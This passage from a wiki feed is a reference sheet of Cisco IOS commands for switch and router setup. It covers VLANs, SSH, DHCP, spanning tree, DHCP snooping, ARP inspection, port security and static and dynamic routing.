&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1117</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1117"/>
		<updated>2026-02-23T22:24:35Z</updated>

